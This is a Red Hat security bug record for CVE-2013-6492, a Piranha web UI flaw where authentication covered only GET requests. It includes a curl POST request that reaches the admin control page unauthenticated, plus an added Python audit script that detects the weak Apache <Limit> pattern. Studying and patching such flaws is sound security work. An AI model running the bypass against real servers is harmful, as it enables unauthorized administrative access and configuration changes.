Bug 1043040 (CVE-2013-6492)

Summary: CVE-2013-6492 piranha: web UI authentication bypass using POST requests
Product: [Other] Security Response
Reporter: Othman Madjoudj <athmanem>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: high
Priority: high
Version: unspecified
CC: andreas.schiermeier, cluster-maint, fdinitto, jkurik, rohara, vkrizan
Keywords: Security
Hardware: Unspecified
OS: Unspecified
Doc Type: Bug Fix
Last Closed: 2014-02-13 19:50:31 UTC
Type: Bug
Bug Depends On: 1061903, 1061904, 1061905, 1061906
Bug Blocks: 1043709
Attachments: Auth bypass fix (flags: none)

Description Othman Madjoudj 2013-12-13 19:58:51 UTC
Created attachment 836487
Auth bypass fix

Description of problem:

In the Piranha web UI configuration, only GET requests require authentication (via <Limit GET>...</Limit> in the config file), so it's possible to display some pages by sending POST requests.

Version-Release number of selected component (if applicable):
piranha-0.8.6-4.el6.x86_64


Steps to Reproduce:

1. GET requests require authentication as expected:

# curl  -I http://192.168.1.34:3636/secure/control.php
HTTP/1.1 401 Authorization Required
Date: Fri, 13 Dec 2013 20:43:35 GMT
Server: Apache/2.2.15 (CentOS) PHP/5.3.3
WWW-Authenticate: Basic realm="access to the piranha web GUI"
Connection: close
Content-Type: text/html; charset=iso-8859-1

2. The same request but with POST:

# curl -d'' -I http://192.168.1.34:3636/secure/control.php 
<HTML>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML Strict Level 3//EN">

<HEAD>
<TITLE>Piranha (Control/Monitoring)</TITLE>
<STYLE TYPE="text/css">
[...]
[...]
[...]
</FORM>
</TD></TR></TABLE>
</BODY>


Actual results:
Admin page displayed

Expected results:
Admin page denied

Additional info:
A fix is attached
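
An added example, not part of the original report or the attached fix: a small Python check that flags Apache <Limit> sections wrapping a Require directive, the pattern described above, where only the listed methods are authenticated and every other method is left open. The function name audit_limit_blocks and both sample configurations are constructed for illustration and are not the piranha httpd.conf.

```python
import re

# Opening/closing tags of method-scoped sections, and Require directives.
OPEN = re.compile(r"^\s*<(Limit|LimitExcept)\s+([^>]*)>", re.I)
CLOSE = re.compile(r"^\s*</(Limit|LimitExcept)>", re.I)
REQUIRE = re.compile(r"^\s*Require\s+\S", re.I)

def audit_limit_blocks(config_text):
    """Return (line, methods) for each <Limit> block that contains Require.

    Inside <Limit M1 M2>, access control applies only to the listed
    methods, so any method not listed reaches the resource unauthenticated.
    """
    findings, block = [], None
    for lineno, line in enumerate(config_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # ignore commented-out directives
        m = OPEN.match(line)
        if m:
            methods = sorted(x.upper() for x in m.group(2).split())
            block = {"kind": m.group(1).lower(), "methods": methods,
                     "line": lineno, "require": False}
        elif block and REQUIRE.match(line):
            block["require"] = True
        elif block and CLOSE.match(line):
            if block["kind"] == "limit" and block["require"]:
                findings.append((block["line"], block["methods"]))
            block = None
    return findings

# Constructed sample: authentication scoped to GET only (the weak pattern).
WEAK = """\
<Directory "/var/www/admin">
    AuthType Basic
    AuthName "admin area"
    AuthUserFile /etc/httpd/admin.passwd
    <Limit GET>
        Require valid-user
    </Limit>
</Directory>
"""

# Constructed sample: Require applies to every method.
FIXED = WEAK.replace("    <Limit GET>\n", "").replace("    </Limit>\n", "")

if __name__ == "__main__":
    for start, methods in audit_limit_blocks(WEAK):
        print(f"line {start}: Require only enforced for {methods}")
```
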

Comment 1 Vincent Danen 2013-12-17 00:25:28 UTC
This would indeed be a security issue, so I'm going to turn this into an SRT bug and get a CVE assigned.  Thank you for this report.

Comment 2 Vincent Danen 2013-12-17 00:34:41 UTC
This also looks to affect upstream piranha as the httpd.conf in question is included in the source file.

Comment 7 Tomas Hoger 2014-02-05 14:51:38 UTC
Original report in the CentOS bug tracker:

http://bugs.centos.org/view.php?id=6825

Comment 8 Tomas Hoger 2014-02-05 15:44:37 UTC
Bumping priority, this can be effectively used to modify lvs.cf configuration file.

Comment 12 errata-xmlrpc 2014-02-13 18:48:05 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2014:0175 https://rhn.redhat.com/errata/RHSA-2014-0175.html

Comment 13 errata-xmlrpc 2014-02-13 18:48:20 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2014:0174 https://rhn.redhat.com/errata/RHSA-2014-0174.html